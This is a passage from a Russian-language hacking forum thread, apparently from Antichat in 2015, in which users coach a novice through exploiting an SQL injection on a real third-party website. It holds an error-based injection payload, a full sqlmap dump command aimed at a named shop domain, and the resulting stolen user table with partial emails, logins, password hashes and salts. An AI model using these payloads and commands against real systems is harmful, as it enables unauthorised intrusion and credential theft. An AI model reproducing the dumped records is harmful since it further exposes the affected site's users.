HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Нашел инъекцию, а дальше???
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.08.2015, 14:59
hicel
Новичок
Регистрация: 19.08.2015
Сообщений: 9
Провел на форуме:
3576

Репутация: 0
По умолчанию
Цитата:
Сообщение от SaNDER  

Тоже не пашет .
Пашет всё=)
 
Ответить с цитированием

  #12  
Старый 28.08.2015, 17:58
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от hicel  

Пашет всё=)
что-то не получается
 
Ответить с цитированием

  #13  
Старый 28.08.2015, 18:02
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от joomla  

что-то не получается
Убери одну скобку в запросе.

")))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23

Надо ошибки тоже читать.
 
Ответить с цитированием

  #14  
Старый 28.08.2015, 23:02
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от kingbeef  

Убери одну скобку в запросе.
")))||1+group+by+concat(version(),floor(rand(0)*2) )having+min(0)%23
Надо ошибки тоже читать.
красавчик ))
 
Ответить с цитированием

  #15  
Старый 29.08.2015, 02:31
strelok20094
Познающий
Регистрация: 26.03.2011
Сообщений: 81
Провел на форуме:
24770

Репутация: 2
По умолчанию
base: w106051

Table: user

[5 entries]

+----------------------+---------------+-------------------------------+-------------+

| email | password | salt | login |

+----------------------+---------------+-------------------------------+-------------+

| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |

| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |

| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |

| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |

| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |

+----------------------+---------------+-------------------------------+-------------+

sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
 
Ответить с цитированием

  #16  
Старый 29.08.2015, 04:24
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от strelok20094  

base: w106051
Table: user
[5 entries]
+----------------------+---------------+-------------------------------+-------------+
| email | password | salt | login |
+----------------------+---------------+-------------------------------+-------------+
| @ya.ru | $2nWSDmGDU.V6 | $2a$14$2JzmyFg/HuG55/xYBrIXMA | delvin |
| @altlogic.ru | $22dAubujSFfU | $2a$14$EnpIvtkw.xRbLRzjwbquxg | admin |
| @mail.ru | $2JpCew0SKvc. | $2a$14$ltDzAFvK5i0qU33i2nvaPg | durova_vita |
| @tagan.ru | $24LkUVLWIjU2 | $2a$14$tk2uQd0jCUpmApJ6kmSB/g | dmi |
| @gmail.com | $2KvStv//sqiM | $2a$14$VNPbpZZMDzNBW8Lt9JD6dw | obuvka |
+----------------------+---------------+-------------------------------+-------------+
sqlmap -u "http://обувъка.рф/shop/product/filter?productFilter[_ef][gender][]="*" --dbms Mysql --time-sec 10 --threads 10 --level 3 --risk 3 --technique E -D w106051 -T user -C email,password,salt,login --dump
Можете рассказать как сделали?
 
Ответить с цитированием

  #17  
Старый 29.08.2015, 11:49
hicel
Новичок
Регистрация: 19.08.2015
Сообщений: 9
Провел на форуме:
3576

Репутация: 0
По умолчанию
Цитата:
Сообщение от joomla  

Можете рассказать как сделали?
sqlmap гугли...
 
Ответить с цитированием

  #18  
Старый 29.08.2015, 17:48
joomla
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от hicel  

sqlmap гугли...
От души
 
Ответить с цитированием

  #19  
Старый 30.08.2015, 00:08
hicel
Новичок
Регистрация: 19.08.2015
Сообщений: 9
Провел на форуме:
3576

Репутация: 0
По умолчанию
Цитата:
Сообщение от joomla  

От души
Так то думать надо .... читать ...

(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
 
Ответить с цитированием

  #20  
Старый 29.10.2015, 08:04
darkart
Новичок
Регистрация: 28.10.2015
Сообщений: 12
Провел на форуме:
4638

Репутация: 0
По умолчанию
Цитата:
Сообщение от hicel  

Так то думать надо .... читать ...
(sqlmap - хороший софт, но лучше учись сам раскручивать ИМХО.)
зачем изобретать велосипед? есть софт он работает

по логу можно понять что происходит

а вот если автоматизация не прокатила то да имеет смысл копать руками!

п.с. имхо
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.